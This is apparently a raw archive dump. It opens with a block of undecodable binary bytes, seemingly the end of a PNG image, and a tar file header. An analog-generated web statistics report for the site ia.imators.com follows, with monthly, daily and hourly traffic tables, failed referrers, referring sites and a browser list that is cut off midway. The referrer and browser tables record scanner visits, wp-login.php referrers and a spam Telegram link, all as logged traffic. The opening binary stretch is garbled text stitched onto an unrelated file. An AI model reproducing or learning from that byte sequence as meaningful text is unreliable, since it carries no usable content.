V=+�X[����U��)�pXת݃!��/��>�l�p.cն�U݊��ժᑵ�Uc��*X5_�r��ÊV?�w�jy��G�X�\Xy�}�xb�d�k/+~X궛U��=���UӅ����J&��N��rb��B�B"X@2�o��U�#+�1�;�Vۅ%XHr����U�]����]J���,$9�=���.�b�QZ��`!�b����0�U���/,�B�Ǫ݇�wa�vi�_X����U�ta �ni1(�"V���PX/ò/~^���U��, ��Uojq�XKX��Ga �2V�>�хKXuJ�šP-bU9 2i�e��Ȥ X��Ma����"`m�Z| ���uj��X$�m�ȧ IX��QҰ64�'�&$b��Z��hX������X+�����X������Xk�7+2֊��l`) [��B���-��:�_*�D�=�@,j'~r�A�b_A𤂱�^nE�r^��X���ɖj V�ٝ⌳�k�\/Z��=f V�$��Y��~\��\Vc�nt���^U.��{��XN��X�`, �D���"X@�`, �d�����Ό���ϫ ������<_�'���?Xm���7�G�/���&���i��U�xg��fWOZXI�����s뾰�7v�;X��m��hg��q_��A����@3���R�[yMau;�~��=�;�_&��n_3ܛ������h�}P���_ ߃�b� �G�Dk?�u�f�?������ ��7wC=r�m��>��NH�� _��/fI�Z��+K��l��po���`=�-,�����RVI=����Q��tc�6�d��gX�Kc��j3[��g�G ��G��O���B��}<���0��6RN�?�|��:Uq��J&�.=��E�ȹ!�"X@�`, �D���"X@�`, �$`Y )��]B�[��v�h%�ޕ9oJ ��_��$JUA@g� IEND�B`� 10.html 0000644 00000160170 15114762025 0005662 0 ustar 00 <?xml version="1.0" encoding="ISO-8859-1"?> <?xml-stylesheet href="#internalStyle" type="text/css"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Web Server Statistics for ia.imators.com</title> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <meta name="robots" content="noindex,nofollow" /> <meta name="generator" content="analog 6.0/Unix" /> <style type="text/css" id="internalStyle"> h2 { background-color: #A0C0F0; width: 98%; padding: 3px 6px; } table { text-align: right; margin-left: 30px; background-color: #D0E0F0; border-collapse: collapse; } th { border-bottom: 1px solid #404050; border-right: 1px dotted #606070; border-top: none; border-left: none; padding: 0px 5px 1px 5px; font-weight: bold; background-color: #A0C0F0; } td { padding: 0px 5px 1px 5px; border-right: 1px dotted #606070; border-left: none; border-bottom: none; border-top:none; } td.x { font-family: monospace; white-space: pre; } .xl { text-align: left; border-right: none; } .xr { text-align: right; border-right: none; } .bar { text-align: left; border-right: none; } tr.sub {background-color: #C0C0FF; font-style: italic; } .repdesc { font-style: italic; } .repspan { font-style: italic; } .goto { font-size: small; } .gensumtitle { font-weight: bold; } .gototitle { font-weight: bold; } .runtimetitle { font-weight: bold; } img { border-style: none; } a:link { color: blue; text-decoration: none; } a:visited { color: purple; text-decoration: none; } a:link:hover { text-decoration: underline; } a:visited:hover { text-decoration: underline; } a:link:active { color: red; text-decoration: underline; } a:visited:active { color: red; text-decoration: underline; } </style> </head> <body> <div class="header"><h1><a name="Top" id="Top" href="http://www.analog.cx/"><img src="/images/analogo.png" alt="" /></a> Web Server Statistics for <a href="http://ia.imators.com/">ia.imators.com</a></h1> <p class="analysisspan">Program started on Fri, Oct 31 2025 at 12:03 PM. <br />Analyzed requests from Wed, May 15 2024 at 10:34 PM to Fri, Oct 31 2025 at 1:58 AM (533.14 days).</p> </div> <div class="gensum"><h2><a name="gensum" id="gensum">General Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | General Summary | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="lastseven">Figures in parentheses refer to the 7-day period ending Oct 31 2025 at 12:03 PM.</p> <p class="gensumlines"> <span class="gensumtitle">Successful requests:</span> 1,413 (25) <br /><span class="gensumtitle">Average successful requests per day:</span> 2 (3) <br /><span class="gensumtitle">Successful requests for pages:</span> 990 (18) <br /><span class="gensumtitle">Average successful requests for pages per day:</span> 1 (2) <br /><span class="gensumtitle">Failed requests:</span> 3,670 (110) <br /><span class="gensumtitle">Redirected requests:</span> 6 (0) <br /><span class="gensumtitle">Distinct files requested:</span> 86 (1,345) <br /><span class="gensumtitle">Distinct hosts served:</span> 724 (931) <br /><span class="gensumtitle">Data transferred:</span> 1.51 megabytes (24.10 kilobytes) <br /><span class="gensumtitle">Average data transferred per day:</span> 2.90 kilobytes (3.44 kilobytes) </p> </div><div class="month"><h2><a name="month" id="month">Monthly Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | Monthly Report | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">month</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">May 2024</td><td class="R">162</td><td class="P">101</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Jun 2024</td><td class="R">69</td><td class="P">63</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2024</td><td class="R">141</td><td class="P">97</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2024</td><td class="R">45</td><td class="P">41</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sep 2024</td><td class="R">148</td><td class="P">82</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Oct 2024</td><td class="R">24</td><td class="P">20</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Nov 2024</td><td class="R">59</td><td class="P">31</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Dec 2024</td><td class="R">26</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> </td><td class="R"> </td><td class="P"> </td><td class="bar"> </td></tr> <tr><td class="x">Jan 2025</td><td class="R">63</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Feb 2025</td><td class="R">21</td><td class="P">18</td><td class="bar"><img src="/images/barb4.png" alt="++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Mar 2025</td><td class="R">65</td><td class="P">53</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Apr 2025</td><td class="R">31</td><td class="P">21</td><td class="bar"><img src="/images/barb4.png" alt="+++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">May 2025</td><td class="R">79</td><td class="P">58</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Jun 2025</td><td class="R">75</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Jul 2025</td><td class="R">62</td><td class="P">55</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Aug 2025</td><td class="R">134</td><td class="P">106</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Sep 2025</td><td class="R">133</td><td class="P">85</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Oct 2025</td><td class="R">76</td><td class="P">55</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> </tbody></table> <p class="busiesttime">Busiest month: Aug 2025 (106 requests for pages).</p> </div><div class="daysum"><h2><a name="daysum" id="daysum">Daily Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | Daily Summary | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 4 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">day</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x">Sun</td><td class="R">192</td><td class="P">153</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Mon</td><td class="R">154</td><td class="P">108</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Tue</td><td class="R">264</td><td class="P">174</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">Wed</td><td class="R">159</td><td class="P">120</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Thu</td><td class="R">232</td><td class="P">139</td><td class="bar"><img src="/images/barb32.png" alt="+++++++++++++++++++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">Fri</td><td class="R">193</td><td class="P">168</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">Sat</td><td class="R">219</td><td class="P">128</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++" /></td></tr> </tbody></table> </div><div class="hoursum"><h2><a name="hoursum" id="hoursum">Hourly Summary</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | Hourly Summary | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="eachunit">Each unit (<img src="/images/barb1.png" alt="+" />) represents 3 requests for pages or part thereof.</p> <table> <thead><tr><th class="x">hour</th><th class="R">#reqs</th><th class="P">#pages</th><th class="bar"> </th></tr></thead> <tbody><tr><td class="x"> 0</td><td class="R">36</td><td class="P">33</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 1</td><td class="R">97</td><td class="P">55</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 2</td><td class="R">53</td><td class="P">30</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x"> 3</td><td class="R">129</td><td class="P">70</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++++++++++" /><img src="/images/barb8.png" alt="" /></td></tr> <tr><td class="x"> 4</td><td class="R">44</td><td class="P">32</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 5</td><td class="R">50</td><td class="P">36</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x"> 6</td><td class="R">57</td><td class="P">39</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 7</td><td class="R">49</td><td class="P">39</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 8</td><td class="R">70</td><td class="P">57</td><td class="bar"><img src="/images/barb16.png" alt="+++++++++++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x"> 9</td><td class="R">41</td><td class="P">35</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">10</td><td class="R">46</td><td class="P">44</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">11</td><td class="R">32</td><td class="P">32</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">12</td><td class="R">55</td><td class="P">44</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">13</td><td class="R">48</td><td class="P">46</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> <tr><td class="x">14</td><td class="R">42</td><td class="P">42</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /></td></tr> <tr><td class="x">15</td><td class="R">36</td><td class="P">26</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">16</td><td class="R">47</td><td class="P">35</td><td class="bar"><img src="/images/barb8.png" alt="++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">17</td><td class="R">39</td><td class="P">23</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">18</td><td class="R">52</td><td class="P">43</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++++++++" /><img src="/images/barb4.png" alt="" /><img src="/images/barb2.png" alt="" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">19</td><td class="R">35</td><td class="P">27</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">20</td><td class="R">27</td><td class="P">25</td><td class="bar"><img src="/images/barb8.png" alt="+++++++++" /><img src="/images/barb1.png" alt="" /></td></tr> <tr><td class="x">21</td><td class="R">31</td><td class="P">22</td><td class="bar"><img src="/images/barb8.png" alt="++++++++" /></td></tr> <tr><td class="x">22</td><td class="R">233</td><td class="P">108</td><td class="bar"><img src="/images/barb32.png" alt="++++++++++++++++++++++++++++++++++++" /><img src="/images/barb4.png" alt="" /></td></tr> <tr><td class="x">23</td><td class="R">64</td><td class="P">47</td><td class="bar"><img src="/images/barb16.png" alt="++++++++++++++++" /></td></tr> </tbody></table> </div><div class="dom"><h2><a name="dom" id="dom">Domain Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | Domain Report | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing domains, sorted by the amount of traffic.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">domain</th></tr></thead> <tbody><tr><td class="R">1413</td><td class="b">100%</td><td class="xl">[unresolved numerical addresses]</td></tr> </tbody></table> </div><div class="org"><h2><a name="org" id="org">Organization Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | Organization Report | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./org.png" alt="" /></p> <p class="whatinc"> Listing the top 20 organizations by the number of requests, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="b">%bytes</th><th class="xl">organization</th></tr></thead> <tbody><tr><td class="R">98</td><td class="b"> 5.91%</td><td class="xl">34</td></tr> <tr><td class="R">86</td><td class="b"> 5.55%</td><td class="xl">205.169</td></tr> <tr><td class="R">67</td><td class="b"> 3.19%</td><td class="xl">104</td></tr> <tr><td class="R">64</td><td class="b"> 5.01%</td><td class="xl">198.235</td></tr> <tr><td class="R">62</td><td class="b">22.17%</td><td class="xl">20</td></tr> <tr><td class="R">54</td><td class="b"> 2.61%</td><td class="xl">47</td></tr> <tr><td class="R">51</td><td class="b"> 4.37%</td><td class="xl">205.210</td></tr> <tr><td class="R">45</td><td class="b"> 2.65%</td><td class="xl">3</td></tr> <tr><td class="R">45</td><td class="b"> 2.76%</td><td class="xl">35</td></tr> <tr><td class="R">40</td><td class="b"> 2.76%</td><td class="xl">54</td></tr> <tr><td class="R">39</td><td class="b"> 2.93%</td><td class="xl">45</td></tr> <tr><td class="R">32</td><td class="b"> 1.15%</td><td class="xl">167.94</td></tr> <tr><td class="R">30</td><td class="b"> 1.89%</td><td class="xl">123</td></tr> <tr><td class="R">21</td><td class="b"> 4.69%</td><td class="xl">106</td></tr> <tr><td class="R">18</td><td class="b"> 0.07%</td><td class="xl">194.87</td></tr> <tr><td class="R">17</td><td class="b"> 0.68%</td><td class="xl">18</td></tr> <tr><td class="R">16</td><td class="b"> 0.61%</td><td class="xl">199.45</td></tr> <tr><td class="R">15</td><td class="b"> 0.52%</td><td class="xl">206.168</td></tr> <tr><td class="R">15</td><td class="b"> 0.94%</td><td class="xl">27</td></tr> <tr><td class="R">14</td><td class="b"> 0.27%</td><td class="xl">195.211</td></tr> <tr><td class="R">584</td><td class="b">29.25%</td><td class="xl">[not listed: 141 organizations]</td></tr> </tbody></table> </div><div class="redirref"><h2><a name="redirref" id="redirref">Redirected Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | Redirected Referrer Report | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p class="whatinc"> Listing referring URLs, sorted by the number of redirected requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">1</td><td class="xl"><a href="http://www.ia.imators.com/cgi-bin">http://www.ia.imators.com/cgi-bin</a></td></tr> </tbody></table> </div><div class="failref"><h2><a name="failref" id="failref">Failed Referrer Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | Failed Referrer Report | <a href="#refsite">Referring Site Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./failref.png" alt="" /></p> <p class="whatinc"> Listing referring URLs, sorted by the number of failed requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">URL</th></tr></thead> <tbody><tr><td class="R">126</td><td class="xl"><a href="https://www.google.com/">https://www.google.com/</a></td></tr> <tr><td class="R">84</td><td class="xl"><a href="http://www.ia.imators.com/">http://www.ia.imators.com/</a></td></tr> <tr><td class="R">36</td><td class="xl"><a href="http://ia.imators.com/">http://ia.imators.com/</a></td></tr> <tr><td class="R">20</td><td class="xl"><a href="https://www.ia.imators.com/">https://www.ia.imators.com/</a></td></tr> <tr><td class="R">7</td><td class="xl"><a href="https://ia.imators.com/">https://ia.imators.com/</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://www.i-conn.nl//wp-login.php">https://www.i-conn.nl//wp-login.php</a></td></tr> <tr><td class="R">5</td><td class="xl"><a href="https://ia-imaging.com//blog//wp-login.php">https://ia-imaging.com//blog//wp-login.php</a></td></tr> <tr><td class="R">2</td><td class="xl"><a href="www.google.comhttps://t.me/optimasprimetools">www.google.comhttps://t.me/optimasprimetools</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://www.ia.imators.com/cgi-bin">http://www.ia.imators.com/cgi-bin</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="https://www.ia.imators.com/cgi-bin/">https://www.ia.imators.com/cgi-bin/</a></td></tr> <tr><td class="R">1</td><td class="xl"><a href="http://ia.imators.com/favicon.ico">http://ia.imators.com/favicon.ico</a></td></tr> </tbody></table> </div><div class="refsite"><h2><a name="refsite" id="refsite">Referring Site Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | Referring Site Report | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./refsite.png" alt="" /></p> <p class="whatinc"> Listing referring sites, sorted by the number of requests.</p> <table> <thead><tr><th class="R">#reqs</th><th class="xl">site</th></tr></thead> <tbody><tr><td class="R">130</td><td class="xl">http://www.ia.imators.com/</td></tr> <tr><td class="R">53</td><td class="xl">http://ia.imators.com/</td></tr> <tr><td class="R">24</td><td class="xl">https://www.ia.imators.com/</td></tr> <tr><td class="R">12</td><td class="xl">https://www.google.com/</td></tr> <tr><td class="R">4</td><td class="xl">https://ia.imators.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://webdisk.birkenheaddrill.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.google.fr/</td></tr> <tr><td class="R">1</td><td class="xl">https://158.193.145.151/</td></tr> <tr><td class="R">1</td><td class="xl">http://p7g6av7v.hongch.cn/</td></tr> <tr><td class="R">1</td><td class="xl">http://www.kaylanicoledigitalmarketing.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.gestionpl.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://27.6.173.252/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.27.248.198/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.521qquu58.xyz/</td></tr> <tr><td class="R">1</td><td class="xl">http://uwcuapimanagement.configuration.azure-api.net/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.i-conn.nl/</td></tr> <tr><td class="R">1</td><td class="xl">https://ia-imaging.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://www.google.ca/</td></tr> <tr><td class="R">1</td><td class="xl">https://clatsopcomputersolutions.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.blog.davideramirez.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://194.87.217.15/</td></tr> <tr><td class="R">1</td><td class="xl">https://mail.mgbacgiang3s.com/</td></tr> <tr><td class="R">1</td><td class="xl">https://parkerjconstruction.com/</td></tr> <tr><td class="R">1</td><td class="xl">http://175.24.179.113/</td></tr> <tr><td class="R">1</td><td class="xl">http://b.wjui.net/</td></tr> <tr><td class="R">1</td><td class="xl">http://156.237.46.172/</td></tr> </tbody></table> </div><div class="browrep"><h2><a name="browrep" id="browrep">Browser Report</a></h2> <p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#failref">Failed Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | Browser Report | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p> <p><img src="./browrep.png" alt="" /></p> <p class="whatinc"> Listing the top 40 browsers by the number of requests for pages, sorted by the number of requests for pages.</p> <table> <thead><tr><th class="R">#reqs</th><th class="P">#pages</th><th class="xl">browser</th></tr></thead> <tbody><tr><td class="R">75</td><td class="P">75</td><td class="xl">Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)</td></tr> <tr><td class="R">48</td><td class="P">48</td><td class="xl">Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36</td></tr> <tr><td class="R">43</td><td class="P">43</td><td class="xl">Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com</td></tr> <tr><td class="R">62</td><td class="P">42</td><td class="xl">Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; 